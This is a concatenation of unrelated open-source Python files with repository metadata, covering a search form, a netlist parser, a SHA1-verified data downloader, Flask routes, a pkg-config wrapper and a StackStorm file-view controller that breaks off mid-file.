""" Most streams will contain a `Channel` with more information. """
def __init__(self):
self.name = ""
self.display_name = ""
self.banner = ""
self.logo = ""
def __repr__(self):
return "<Channel: {0}>".format(self.name)
|
mit
| -3,287,934,114,056,025,600
| 28.92437
| 84
| 0.596462
| false
| 4.423602
| false
| false
| false
|
Alberto-Beralix/Beralix
|
i386-squashfs-root/usr/share/pyshared/ubuntuone-client/ubuntuone/status/messaging.py
|
1
|
1398
|
# ubuntuone.status.messaging - Messages to the user
#
# Author: Eric Casteleijn <eric.casteleijn@canonical.com>
#
# Copyright 2011 Canonical Ltd.
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 3, as published
# by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranties of
# MERCHANTABILITY, SATISFACTORY QUALITY, or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
"""Module that defines the interfaces for messaging the end user."""
from abc import ABCMeta, abstractmethod
APPLICATION_NAME = 'Ubuntu One Client'
class AbstractMessaging(object):
"""Abstract Base Class for notification implementations."""
__metaclass__ = ABCMeta
# pylint: disable=R0913
@abstractmethod
def show_message(self, sender, callback=None, message_time=None,
message_count=None, icon=None):
"""Show a message in the messaging menu."""
# pylint: enable=R0913
@abstractmethod
def update_count(self, sender, add_count):
"""Update the count for an existing indicator."""
|
gpl-3.0
| -7,006,785,282,109,029,000
| 34.846154
| 75
| 0.726037
| false
| 4.052174
| false
| false
| false
|
RENCI/xDCIShare
|
hs_core/discovery_form.py
|
1
|
4927
|
from haystack.forms import FacetedSearchForm
from haystack.query import SQ, SearchQuerySet
from crispy_forms.layout import *
from crispy_forms.bootstrap import *
from django import forms
class DiscoveryForm(FacetedSearchForm):
NElat = forms.CharField(widget = forms.HiddenInput(), required=False)
NElng = forms.CharField(widget = forms.HiddenInput(), required=False)
SWlat = forms.CharField(widget = forms.HiddenInput(), required=False)
SWlng = forms.CharField(widget = forms.HiddenInput(), required=False)
start_date = forms.DateField(label='From Date', required=False)
end_date = forms.DateField(label='To Date', required=False)
def search(self):
if not self.cleaned_data.get('q'):
sqs = self.searchqueryset.filter(discoverable=True).filter(is_replaced_by=False)
else:
sqs = super(FacetedSearchForm, self).search().filter(discoverable=True).filter(is_replaced_by=False)
geo_sq = SQ()
if self.cleaned_data['NElng'] and self.cleaned_data['SWlng']:
if float(self.cleaned_data['NElng']) > float(self.cleaned_data['SWlng']):
geo_sq.add(SQ(coverage_east__lte=float(self.cleaned_data['NElng'])), SQ.AND)
geo_sq.add(SQ(coverage_east__gte=float(self.cleaned_data['SWlng'])), SQ.AND)
else:
geo_sq.add(SQ(coverage_east__gte=float(self.cleaned_data['SWlng'])), SQ.AND)
geo_sq.add(SQ(coverage_east__lte=float(180)), SQ.OR)
geo_sq.add(SQ(coverage_east__lte=float(self.cleaned_data['NElng'])), SQ.AND)
geo_sq.add(SQ(coverage_east__gte=float(-180)), SQ.AND)
if self.cleaned_data['NElat'] and self.cleaned_data['SWlat']:
geo_sq.add(SQ(coverage_north__lte=float(self.cleaned_data['NElat'])), SQ.AND)
geo_sq.add(SQ(coverage_north__gte=float(self.cleaned_data['SWlat'])), SQ.AND)
if geo_sq:
sqs = sqs.filter(geo_sq)
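# Note: the else branch above covers a bounding box that crosses the
# antimeridian (NElng numerically smaller than SWlng), so the east-coverage
# filter wraps through +/-180 degrees.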
# Check to see if a start_date was chosen.
if self.cleaned_data['start_date']:
sqs = sqs.filter(coverage_start_date__gte=self.cleaned_data['start_date'])
# Check to see if an end_date was chosen.
if self.cleaned_data['end_date']:
sqs = sqs.filter(coverage_end_date__lte=self.cleaned_data['end_date'])
author_sq = SQ()
subjects_sq = SQ()
resource_sq = SQ()
public_sq = SQ()
owner_sq = SQ()
discoverable_sq = SQ()
published_sq = SQ()
variable_sq = SQ()
sample_medium_sq = SQ()
units_name_sq = SQ()
# We need to process each facet to ensure that the field name and the
# value are quoted correctly and separately:
for facet in self.selected_facets:
if ":" not in facet:
continue
field, value = facet.split(":", 1)
if value:
if "creators" in field:
author_sq.add(SQ(creators=sqs.query.clean(value)), SQ.OR)
elif "subjects" in field:
subjects_sq.add(SQ(subjects=sqs.query.clean(value)), SQ.OR)
elif "resource_type" in field:
resource_sq.add(SQ(resource_type=sqs.query.clean(value)), SQ.OR)
elif "public" in field:
public_sq.add(SQ(public=sqs.query.clean(value)), SQ.OR)
elif "owners_names" in field:
owner_sq.add(SQ(owners_names=sqs.query.clean(value)), SQ.OR)
elif "discoverable" in field:
discoverable_sq.add(SQ(discoverable=sqs.query.clean(value)), SQ.OR)
elif "published" in field:
published_sq.add(SQ(published=sqs.query.clean(value)), SQ.OR)
elif 'variable_names' in field:
variable_sq.add(SQ(variable_names=sqs.query.clean(value)), SQ.OR)
elif 'sample_mediums' in field:
sample_medium_sq.add(SQ(sample_mediums=sqs.query.clean(value)), SQ.OR)
elif 'units_names' in field:
units_name_sq.add(SQ(units_names=sqs.query.clean(value)), SQ.OR)
else:
continue
if author_sq:
sqs = sqs.filter(author_sq)
if subjects_sq:
sqs = sqs.filter(subjects_sq)
if resource_sq:
sqs = sqs.filter(resource_sq)
if public_sq:
sqs = sqs.filter(public_sq)
if owner_sq:
sqs = sqs.filter(owner_sq)
if discoverable_sq:
sqs = sqs.filter(discoverable_sq)
if published_sq:
sqs = sqs.filter(published_sq)
if variable_sq:
sqs = sqs.filter(variable_sq)
if sample_medium_sq:
sqs = sqs.filter(sample_medium_sq)
if units_name_sq:
sqs = sqs.filter(units_name_sq)
return sqs
|
bsd-3-clause
| -1,619,511,691,017,527,800
| 39.393443
| 112
| 0.574995
| false
| 3.526843
| false
| false
| false
|
thinksabin/lazy-devops
|
S3 bucket Maker/Mailer.py
|
1
|
1471
|
import datetime
import time
import smtplib
import os
from email.mime.text import MIMEText
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from smtplib import SMTP
class Mailer():
smtp_server = ''
smtp_username = ''
smtp_password = ''
smtp_port = '587'
from_add = "noreply@example.com"
def __init__(self, receiver, subject, body, filepath, filename):
self.receiver = receiver
self.subject = subject
self.body = body
self.filepath = filepath
self.filename = filename
self.msg = MIMEMultipart('alternative')
def attach_attachment(self):
part = MIMEApplication(open(self.filepath , "rb").read())
part.add_header('Content-Disposition', 'attachment', filename=self.filename)
self.msg.attach(part)
def send_mail(self):
self.msg['Subject'] = "Your S3 Details"
self.msg['From'] = self.from_add
self.msg['To'] = self.receiver
# text = "Please find the attachment for the s3 bucket details"
part1 = MIMEText(self.body, 'plain')
self.msg.attach(part1)
mail = smtplib.SMTP(host = self.smtp_server, port = self.smtp_port, timeout = 10)
mail.set_debuglevel(10)
mail.starttls()
mail.ehlo()
mail.login(self.smtp_username,self.smtp_password)
mail.sendmail(self.from_add, self.receiver, self.msg.as_string())
mail.quit()
|
apache-2.0
| 7,089,824,654,200,791,000
| 29.020408
| 89
| 0.639701
| false
| 3.771795
| false
| false
| false
|
mph-/lcapy
|
lcapy/parser.py
|
1
|
8849
|
"""This module performs parsing of SPICE-like netlists. It uses a
custom parser rather than lex/yacc to give better error messages.
Copyright 2015--2020 Michael Hayes, UCECE
"""
import re
# Could use a script to generate parser and parsing tables if speed
# was important.
def split(s, delimiters):
"""Split string by specified delimiters but not if a delimiter is
within curly brackets {} or ""."""
parts = []
current = []
close_bracket = ''
bracket_stack = []
for c in (s + delimiters[0]):
if c in delimiters and len(bracket_stack) == 0:
if len(current) > 0:
parts.append(''.join(current))
current = []
else:
if c == close_bracket:
close_bracket = bracket_stack.pop()
elif c == '{':
bracket_stack.append(close_bracket)
close_bracket = '}'
elif c == '"':
bracket_stack.append(close_bracket)
close_bracket = '"'
current.append(c)
if close_bracket != '':
raise ValueError('Missing %s in %s' % (close_bracket, s))
return parts
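# Hedged usage sketch (the real delimiter set comes from the grammar module; a
# plain space is assumed here): a braced expression stays a single field.
def _split_example():
    return split('V1 2 0 {2 * a + b}', ' ')  # ['V1', '2', '0', '{2 * a + b}']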
class Param(object):
def __init__(self, name, base, comment):
self.name = name
self.base = base
self.comment = comment
self.baseclass = None
def is_valid(self, string):
if self.baseclass is None:
return True
return self.baseclass.is_valid(string)
class Rule(object):
def __init__(self, cpt_type, classname, params, comment, pos):
self.type = cpt_type
self.classname = classname
self.params = params
self.comment = comment
self.pos = pos
def __repr__(self):
return self.type + 'name ' + ' '.join(self.params)
def syntax_error(self, error, string):
raise ValueError('Syntax error: %s when parsing %s\nExpected format: %s' % (error, string, repr(self)))
def process(self, paramdict, string, fields, name, namespace):
params = self.params
if len(fields) > len(params):
extra = ''
if '(' in string:
extra = ' (perhaps enclose expressions with parentheses in {})'
self.syntax_error('Too many args' + extra, string)
nodes = []
args = []
for m, param in enumerate(params):
if m >= len(fields):
# Optional argument
if param[0] == '[':
break
self.syntax_error('Missing arg %s' % param, string)
if param[0] == '[':
param = param[1:-1]
field = fields[m]
if paramdict[param].base in ('pin', 'node'):
if field[0] == '.':
# Note, name contains namespace
field = name + field
else:
field = namespace + field
nodes.append(field)
elif paramdict[param].base != 'keyword':
args.append(field)
return tuple(nodes), args
class Parser(object):
def __init__(self, cpts, grammar, allow_anon=False):
"""cpts is a module containing a class for each component
grammar is a module defining the syntax of a netlist"""
# A string defining the syntax for a netlist
rules = grammar.rules
# A string defining parameters
params = grammar.params
# A string defining delimiter characters
self.delimiters = grammar.delimiters
# A string defining comment characters
self.comments = grammar.comments
self.allow_anon = allow_anon
self.cpts = cpts
self.paramdict = {}
self.ruledict = {}
for param in params.split('\n'):
self._add_param(param)
for rule in rules.split('\n'):
self._add_rule(rule)
cpts = sorted(self.ruledict.keys(), key=len, reverse=True)
# The symbol name must be a valid Sympy symbol name so
# it cannot include symbols such as + and -.
self.cpt_pattern = re.compile("(%s)([#_\w'?]+)?" % '|'.join(cpts))
def _add_param(self, string):
if string == '':
return
fields = string.split(':')
paramname = fields[0]
fields = fields[1].split(';', 1)
parambase = fields[0].strip()
comment = fields[1].strip()
self.paramdict[paramname] = Param(paramname, parambase, comment)
def _add_rule(self, string):
if string == '':
return
fields = string.split(':')
cpt_classname = fields[0]
fields = fields[1].split(';', 1)
string = fields[0].strip()
comment = fields[1].strip()
fields = string.split(' ')
params = fields[1:]
# Skip the name part in the rule, e.g., only consider D from Dname.
cpt_type = fields[0][0:-4]
pos = None
for m, param in enumerate(params):
if param[0] == '[':
param = param[1:-1]
if param not in self.paramdict:
raise ValueError('Unknown parameter %s for %s' % (param, string))
if pos is None and self.paramdict[param].base == 'keyword':
pos = m
if cpt_type not in self.ruledict:
self.ruledict[cpt_type] = ()
self.ruledict[cpt_type] += (Rule(cpt_type, cpt_classname,
params, comment, pos), )
def parse(self, string, namespace='', parent=None):
"""Parse string and create object"""
directive = False
net = string.strip()
if net == '':
directive = True
elif net[0] in self.comments:
directive = True
elif net[0] == ';':
directive = True
elif net[0] == '.':
directive = True
if directive:
cpt_type = 'XX'
cpt_id = ''
name = 'XX'
name += parent._make_anon(cpt_type)
defname = namespace + cpt_type + cpt_id
if string.startswith(';') and not string.startswith(';;'):
opts_string = string[1:]
else:
opts_string = ''
return self.cpts.make('XX', parent, '', defname, name,
cpt_type, cpt_id, string, opts_string, (), '')
net = namespace + net
parts = net.split(';', 1)
fields = split(parts[0], self.delimiters)
# Strip {} and "".
for m, field in enumerate(fields):
if field[0] in '{"':
fields[m] = fields[m][1:-1]
name = fields.pop(0)
parts = name.split('.')
namespace = ''
if len(parts) > 1:
namespace = '.'.join(parts[0:-1]) + '.'
name = parts[-1]
match = self.cpt_pattern.match(name)
if match is None:
raise ValueError('Unknown component %s while parsing "%s"' % (name, net))
groups = match.groups()
cpt_type, cpt_id = groups[0], groups[1]
if cpt_id is None:
cpt_id = ''
# This is the most hackery aspect of this parser where we
# choose the rule pattern based on a keyword. If the
# keyword is not present, default to first rule pattern.
# Perhaps a factory should sort this out?
rule = self.ruledict[cpt_type][0]
keyword = ''
for rule1 in self.ruledict[cpt_type]:
pos = rule1.pos
if pos is None:
continue
if len(fields) > pos and fields[pos].lower() == rule1.params[pos]:
rule = rule1
keyword = rule1.params[pos]
break
defname = namespace + cpt_type + cpt_id
name = defname
if (cpt_id == '' and parent is not None
and (cpt_type in ('A', 'W', 'O', 'P')) or self.allow_anon):
name += parent._make_anon(cpt_type)
elif cpt_id == '?':
# Automatically name cpts to ensure they are unique
name = name[:-1] + parent._make_anon(cpt_type)
nodes, args = rule.process(self.paramdict, net, fields, name,
namespace)
parts = net.split(';', 1)
opts_string = parts[1].strip() if len(parts) > 1 else ''
keyword = (pos, keyword)
# self.cpts is either the mnacpts or schematic module
return self.cpts.make(rule.classname, parent, namespace,
defname, name, cpt_type, cpt_id, net,
opts_string, tuple(nodes), keyword,
*args)
|
lgpl-2.1
| 5,817,020,142,593,945,000
| 30.716846
| 119
| 0.508984
| false
| 4.191852
| false
| false
| false
|
OSEHRA/VistA
|
Scripts/ExternalDownloader.py
|
1
|
4599
|
#---------------------------------------------------------------------------
# Copyright 2013-2019 The Open Source Electronic Health Record Alliance
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#---------------------------------------------------------------------------
from future import standard_library
standard_library.install_aliases()
from builtins import object
import sys
import os
import urllib.request, urllib.parse, urllib.error
from LoggerManager import logger, initConsoleLogging
from ConvertToExternalData import generateExternalDataFileName
from ConvertToExternalData import generateSha1Sum
"""
Download External Data
"""
DEFAULT_EXTERNAL_DOWNLOAD_SITE_URL = "https://code.worldvista.org/content/SHA1"
""" find or download the external KIDS Build file, return the file path """
def obtainKIDSBuildFileBySha1(filePath, sha1Sum, cacheDir):
assert cacheDir and os.path.exists(cacheDir)
rootDir = os.path.dirname(filePath)
externalFileName = generateExternalDataFileName(sha1Sum)
externalFile = os.path.join(rootDir, externalFileName)
logger.info("Checking %s" % externalFile)
if os.path.exists(externalFile):
if generateSha1Sum(externalFile) == sha1Sum:
return (True, externalFile)
else:
os.remove(externalFile)
""" try to find the file in the cache dir """
externalFile = os.path.join(cacheDir, externalFileName.replace('_','/'))
logger.info("Checking %s" % externalFile)
if os.path.exists(externalFile):
if generateSha1Sum(externalFile) == sha1Sum:
return (True, externalFile)
else:
os.remove(externalFile)
""" make sure cacheDir has the right layout """
rootDir = os.path.dirname(externalFile)
if not os.path.exists(rootDir):
os.makedirs(rootDir)
""" download from remote """
extDownloader = ExternalDataDownloader()
logger.info("Downloading from remote link")
result = extDownloader.downloadExternalDataByHash(sha1Sum, externalFile)
if not result:
logger.error("Downloading from remote failed")
if os.path.exists(externalFile):
os.remove(externalFile)
externalFile = None
logger.info("%s, %s" % (result, externalFile))
return (result, externalFile)
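# Hedged usage sketch (the path, checksum and cache directory below are made up
# for illustration):
#   ok, kids_file = obtainKIDSBuildFileBySha1(
#       'Packages/Example/EXAMPLE-1.0.KID.sha1',
#       'da39a3ee5e6b4b0d3255bfef95601890afd80709',
#       '/var/cache/vista-external')
#   # (True, <path to the verified file>) on success, (False, None) otherwise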
class ExternalDataDownloader(object):
def __init__(self, siteUrl=DEFAULT_EXTERNAL_DOWNLOAD_SITE_URL):
self._siteUrl = siteUrl
"""
"""
@staticmethod
def downloadExternalDataDirectly(dwnUrl, fileToSave):
try:
urllib.request.urlretrieve(dwnUrl, fileToSave)
return True
except Exception as ex:
logger.error(ex)
return False
"""
"""
def downloadExternalDataByHash(self, sha1Sum, fileToSave):
dwnUrl = "%s/%s" % (self._siteUrl, sha1Sum)
if not self.downloadExternalDataDirectly(dwnUrl, fileToSave):
return False
""" verify the sha1sum of downloaded file """
sha1SumDwn = generateSha1Sum(fileToSave)
if sha1Sum == sha1SumDwn:
return True
logger.error("sha1Sum mismatch %s:%s" % (sha1Sum, sha1SumDwn))
os.remove(fileToSave)
def main():
initConsoleLogging()
# testing obtainKIDSBuildFileBySha1
logger.info(sys.argv)
obtainKIDSBuildFileBySha1(sys.argv[1], sys.argv[2], sys.argv[3])
def downloadAllKIDSSha1File(topDir, cacheDir):
from ConvertToExternalData import isValidKIDSBuildSha1Suffix
from ConvertToExternalData import readSha1SumFromSha1File
import shutil
initConsoleLogging()
absCurDir = os.path.abspath(topDir)
for (root, dirs, files) in os.walk(absCurDir):
for f in files:
if not isValidKIDSBuildSha1Suffix(f):
continue
filePath = os.path.join(root, f)
sha1Sum = readSha1SumFromSha1File(filePath)
result, extFilePath = obtainKIDSBuildFileBySha1(filePath, sha1Sum, cacheDir)
if result:
destFile = filePath[:filePath.rfind('.')]
if os.path.exists(destFile) and generateSha1Sum(destFile) == sha1Sum:
logger.info("%s is already current" % destFile)
continue
logger.info("%s => %s" % (extFilePath, destFile))
shutil.copyfile(extFilePath, destFile)
if __name__ == '__main__':
#main()
downloadAllKIDSSha1File(sys.argv[1], sys.argv[2])
|
apache-2.0
| 1,417,033,469,209,968,000
| 36.08871
| 82
| 0.702979
| false
| 3.720874
| false
| false
| false
|
PnCevennes/SaisieChasse
|
modules/chasse/routes.py
|
1
|
2687
|
#coding: utf8
from flask import Blueprint, request
import json
from sqlalchemy import select
from server import db
from .models import VLieuTirSynonymes, PlanChasse, SaisonChasse
from ..utils.utilssqlalchemy import json_resp
ltroutes = Blueprint('lieux_tir', __name__)
@ltroutes.route('/', methods=['GET'])
@ltroutes.route('/<int:id>', methods=['GET'])
@json_resp
def get_lieutirsyn(id = None):
q = db.session.query(VLieuTirSynonymes)
if request.args.get('code_com') :
print 'code_com', request.args.get('code_com')
q = q.filter_by(code_com = request.args.get('code_com'))
if id:
q = q.filter_by(id=id)
data = q.all()
return [attribut.as_dict() for attribut in data]
@ltroutes.route('/communes', methods=['GET'])
@json_resp
def get_communes():
data = db.session \
.query(VLieuTirSynonymes.nom_com, VLieuTirSynonymes.code_com) \
.distinct(VLieuTirSynonymes.nom_com).all()
return [{"value" : attribut.nom_com, "id" : int(attribut.code_com) } for attribut in data]
pcroutes = Blueprint('plan_chasse', __name__)
@pcroutes.route('/bracelet/<int:id>', methods=['GET'])
@json_resp
def get_bracelet_detail(id = None):
data = db.session.query(PlanChasse).filter_by(id=id).first()
return data.as_dict()
@pcroutes.route('/bracelet/<int:id>', methods=['POST', 'PUT'])
def insertupdate_bracelet_detail(id = None):
data = json.loads(request.data)
o = PlanChasse(**data)
db.session.merge(o)
try:
db.session.commit()
return json.dumps({'success':True, 'message':'Enregistrement sauvegardé avec success'}), 200, {'ContentType':'application/json'}
except Exception as e:
db.session.rollback()
return json.dumps({'success':False, 'message':'Impossible de sauvegarder l\'enregistrement'}), 500, {'ContentType':'application/json'}
@pcroutes.route('/auteurs', methods=['GET'])
@json_resp
def get_auteurs():
s1 = select([PlanChasse.auteur_tir]).distinct()
s2 = select([PlanChasse.auteur_constat]).distinct()
q = s1.union(s2).alias('auteurs')
data = db.session.query(q).all()
return [{"auteur_tir" : a }for a in data]
@pcroutes.route('/saison', methods=['GET'])
@json_resp
def get_saison_list():
data = db.session.query(SaisonChasse).all()
return [a.as_dict() for a in data]
@pcroutes.route('/bracelets_list/<int:saison>', methods=['GET'])
@json_resp
def get_bracelet_list(saison = None):
data = db.session \
.query(PlanChasse.id, PlanChasse.no_bracelet) \
.filter_by(fk_saison = saison)\
.distinct().all()
return [{"no_bracelet" : attribut.no_bracelet, "id" : int(attribut.id) } for attribut in data]
|
gpl-3.0
| 5,255,791,992,090,212,000
| 31.361446
| 142
| 0.661579
| false
| 2.94195
| false
| false
| false
|
yehudagale/fuzzyJoiner
|
old/matcher.py
|
1
|
1840
|
#using tutorial https://suhas.org/sqlalchemy-tutorial/
from sys import argv
from matcher_functions import *
#establish connection to database
con, meta = connect(argv[1], argv[2], argv[3])
#load pairs from database
aliases = get_aliases(con, meta)
#create dictionaries assigning serial numbers to names and names to serial numbers
num_to_word, word_to_num = create_double_num_dicts(aliases)
#load the buckets from the database; bucket_list is arranged as follows:
#bucket_list[pair_of_buckets][bucket(this must be 0 or 1)][name (this represents a single name)][0 for number and 1 for pre-processed name]
bucket_list, bucket_words = load_good_buckets('wordtable1', 'wordtable2', word_to_num, con, meta)
#print out the number of names that are possible to get just based on bucketing:
impossible = get_impossible(aliases, bucket_list, num_to_word)
print("possible matches: " + str(len(aliases) - len(impossible)))
#next make a list to store the outcomes of all our tests:
matches_list = []
#then run our tests
matches_list.append(run_test(lambda x : x.replace(" ", ""), lambda name1, name2 : name1 in name2 or name2 in name1, num_to_word, bucket_list))
matches_list.append(run_test(lambda x : set(x.split()), lambda name1, name2 : name1.issubset(name2) or name2.issubset(name1), num_to_word, bucket_list))
matches_list.append(run_special_test(bucket_list, num_to_word))
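#for example, the first test above strips spaces ("Mary Ann Smith" -> "MaryAnnSmith")
#and accepts a pair when one processed name contains the other, while the second test
#compares the names as sets of words instead (illustrative reading of the lambdas)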
#next create a test dictionary relating each item in the first set to k items in the other set
test_dict = make_test_dict(set([]).union(*matches_list), 1000)
#use this dictionary to calculate and print the f-score
print("fscore: " + str(fscore(aliases, test_dict, 1)))
#next export the items we missed
export_missed(aliases, test_dict, con, meta)
#lastly export the items we could not have gotten since they were not in the same bucket:
export_unbucketed(impossible, con, meta)
|
epl-1.0
| 5,213,486,929,230,568,000
| 62.482759
| 152
| 0.756522
| false
| 3.309353
| true
| false
| false
|
chiffa/PolyPharma
|
bioflow/db_importers/hint_importer.py
|
2
|
1976
|
"""
Set of tools to work with HiNT database
"""
from bioflow.bio_db_parsers.proteinRelParsers import parse_hint
from bioflow.configs.main_configs import hint_csv_path
from bioflow.neo4j_db.GraphDeclarator import DatabaseGraph
from bioflow.utils.log_behavior import get_logger
log = get_logger(__name__)
def get_uniprots_for_hint():
"""
Recovers UP Gene names maps to UNIPROT nodes containing them.
:return:
"""
initial_dict = {}
for node in DatabaseGraph.get_all('UNIPROT'):
initial_dict[node['legacyID']] = node.id
for key in list(initial_dict.keys()):
initial_dict[key.split('_')[0]] = initial_dict.pop(key)
return initial_dict
def cross_ref_hint():
"""
Pulls Hint relationships and connects deprecated_reached_uniprots_neo4j_id_list in the database
:return:
"""
relations_dict = parse_hint(hint_csv_path)
uniprot_ref_dict = get_uniprots_for_hint()
processed_nodes = set()
actual_cross_links = 0
breakpoints = 300
size = len(relations_dict)
log.info('Starting inserting HINT for %s primary nodes' % size)
for i, (legacyId, linked_legacyIds) in enumerate(relations_dict.items()):
if i % breakpoints:
# TODO: [progress bar]
log.info('\t %.2f %%' % (float(i) / float(size) * 100))
if legacyId in list(uniprot_ref_dict.keys()):
for linked_legacyId in linked_legacyIds:
if linked_legacyId in list(uniprot_ref_dict.keys()):
actual_cross_links += 1
DatabaseGraph.link(uniprot_ref_dict[legacyId], uniprot_ref_dict[linked_legacyId],
'is_interacting',
{'source': 'HINT',
'parse_type': 'physical_entity_molecular_interaction'})
log.info('HINT Cross-links: %s, HINT processed nodes: %s',
actual_cross_links, len(processed_nodes))
|
bsd-3-clause
| 8,683,032,263,872,799,000
| 30.870968
| 101
| 0.610324
| false
| 3.659259
| false
| false
| false
|
pni-libraries/python-pni
|
pkgconfig.py
|
1
|
3517
|
from __future__ import print_function
import sys
try:
from subprocess import check_output
def execute(lt):
return check_output(lt)
except Exception:
from subprocess import Popen
from subprocess import PIPE
def execute(lt):
p = Popen(lt, stdout=PIPE)
result = ""
for x in p.stdout:
result += x
return result
def strip_string_list(inlist):
"""
strip_string_list(inlist):
Strip all strings in a list of strings from all leading and
trailing blanks.
input arguments:
inlist ............ input list of strings
return:
new list with all strings stripped.
"""
lt = []
for value in inlist:
lt.append(value.strip())
return lt
def remove_empty_strings(inlist):
"""
remove_empty_strings(inlist):
Remove all empty strings from the list of strings.
input arguments:
inlist ............. inpust list of strings
return:
list without empty strings
"""
cnt = inlist.count('')
outlist = list(inlist)
for i in range(cnt):
outlist.remove('')
return outlist
def split_result(result, key):
result = result.strip()
result = result.split(key)
result = remove_empty_strings(result)
return result
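# Illustrative example with made-up pkg-config output; callers pass the result
# through strip_string_list() to drop the leftover blanks:
def _split_result_example():
    # -> ['/usr/include ', '/usr/local/include'] (the first entry keeps a trailing blank)
    return split_result('-I/usr/include -I/usr/local/include', '-I')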
class package(object):
command = 'pkg-config'
def __init__(self, pkgname):
self.name = pkgname
def _decode(self, data):
if sys.version_info.major >= 3:
return data.decode('utf-8')
else:
return data
def _get_library_dirs(self):
result = self._decode(
execute([self.command, '--libs-only-L', self.name]))
result = split_result(result, '-L')
return strip_string_list(result)
def _get_include_dirs(self):
result = self._decode(
execute([self.command, '--cflags-only-I', self.name]))
result = split_result(result, '-I')
return strip_string_list(result)
def _get_libraries(self):
result = self._decode(
execute([self.command, '--libs-only-l', self.name]))
result = split_result(result, '-l')
return strip_string_list(result)
def _get_compiler_flags(self):
# first we obtain all compiler flags
total_result = self._decode(
execute([self.command, '--cflags', self.name]))
total_result = total_result.strip()
total_result = total_result.split(" ")
total_result = remove_empty_strings(total_result)
# now we have to obtain all the include files
includes = self._decode(
execute([self.command, '--cflags-only-I', self.name]))
includes = includes.strip()
includes = includes.split(" ")
includes = remove_empty_strings(includes)
for header in includes:
total_result.remove(header)
return total_result
library_dirs = property(_get_library_dirs)
libraries = property(_get_libraries)
compiler_flags = property(_get_compiler_flags)
include_dirs = property(_get_include_dirs)
# testing routine
if __name__ == "__main__":
if len(sys.argv) < 2:
print("You have to pass a package name to as a command line argument!")
sys.exit()
name = sys.argv[1]
p = package(name)
print("library directories: ", p.library_dirs)
print("libraries : ", p.libraries)
print("compiler flags : ", p.compiler_flags)
print("include directories: ", p.include_dirs)
|
gpl-2.0
| 9,147,892,070,350,756,000
| 23.943262
| 79
| 0.598521
| false
| 3.987528
| false
| false
| false
|
tonybaloney/st2
|
st2api/st2api/controllers/v1/packviews.py
|
1
|
8858
|
# Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import codecs
import mimetypes
import os
import six
from wsgiref.handlers import format_date_time
from st2api.controllers.v1.packs import BasePacksController
from st2common.exceptions.db import StackStormDBObjectNotFoundError
from st2common import log as logging
from st2common.models.api.pack import PackAPI
from st2common.persistence.pack import Pack
from st2common.content.utils import get_pack_file_abs_path
from st2common.rbac.types import PermissionType
from st2common.rbac import utils as rbac_utils
from st2common.router import abort
from st2common.router import Response
http_client = six.moves.http_client
__all__ = [
'FilesController',
'FileController'
]
http_client = six.moves.http_client
LOG = logging.getLogger(__name__)
BOM_LEN = len(codecs.BOM_UTF8)
# Maximum file size in bytes. If the file on disk is larger then this value, we don't include it
# in the response. This prevents DDoS / exhaustion attacks.
MAX_FILE_SIZE = (500 * 1000)
# File paths in the file controller for which RBAC checks are not performed
WHITELISTED_FILE_PATHS = [
'icon.png'
]
class BaseFileController(BasePacksController):
model = PackAPI
access = Pack
supported_filters = {}
query_options = {}
def get_all(self):
return abort(404)
def _get_file_size(self, file_path):
return self._get_file_stats(file_path=file_path)[0]
def _get_file_stats(self, file_path):
try:
file_stats = os.stat(file_path)
except OSError:
return (None, None)
return file_stats.st_size, file_stats.st_mtime
def _get_file_content(self, file_path):
with codecs.open(file_path, 'rb') as fp:
content = fp.read()
return content
def _process_file_content(self, content):
"""
This method processes the file content and removes unicode BOM character if one is present.
Note: If we don't do that, files view explodes with "UnicodeDecodeError: ... invalid start
byte" because the json.dump doesn't know how to handle BOM character.
"""
if content.startswith(codecs.BOM_UTF8):
content = content[BOM_LEN:]
return content
class FilesController(BaseFileController):
"""
Controller which allows user to retrieve content of all the files inside the pack.
"""
def __init__(self):
super(FilesController, self).__init__()
self.get_one_db_method = self._get_by_ref_or_id
def get_one(self, ref_or_id, requester_user):
"""
Outputs the content of all the files inside the pack.
Handles requests:
GET /packs/views/files/<pack_ref_or_id>
"""
pack_db = self._get_by_ref_or_id(ref_or_id=ref_or_id)
rbac_utils.assert_user_has_resource_db_permission(user_db=requester_user,
resource_db=pack_db,
permission_type=PermissionType.PACK_VIEW)
if not pack_db:
msg = 'Pack with ref_or_id "%s" does not exist' % (ref_or_id)
raise StackStormDBObjectNotFoundError(msg)
pack_ref = pack_db.ref
pack_files = pack_db.files
result = []
for file_path in pack_files:
normalized_file_path = get_pack_file_abs_path(pack_ref=pack_ref, file_path=file_path)
if not normalized_file_path or not os.path.isfile(normalized_file_path):
# Ignore references to files which don't exist on disk
continue
file_size = self._get_file_size(file_path=normalized_file_path)
if file_size is not None and file_size > MAX_FILE_SIZE:
LOG.debug('Skipping file "%s" which size exceeds max file size (%s bytes)' %
(normalized_file_path, MAX_FILE_SIZE))
continue
content = self._get_file_content(file_path=normalized_file_path)
include_file = self._include_file(file_path=file_path, content=content)
if not include_file:
LOG.debug('Skipping binary file "%s"' % (normalized_file_path))
continue
item = {
'file_path': file_path,
'content': content
}
result.append(item)
return result
def _include_file(self, file_path, content):
"""
Method which returns True if the following file content should be included in the response.
Right now we exclude any file with UTF8 BOM character in it - those are most likely binary
files such as icon, etc.
"""
if codecs.BOM_UTF8 in content[:1024]:
return False
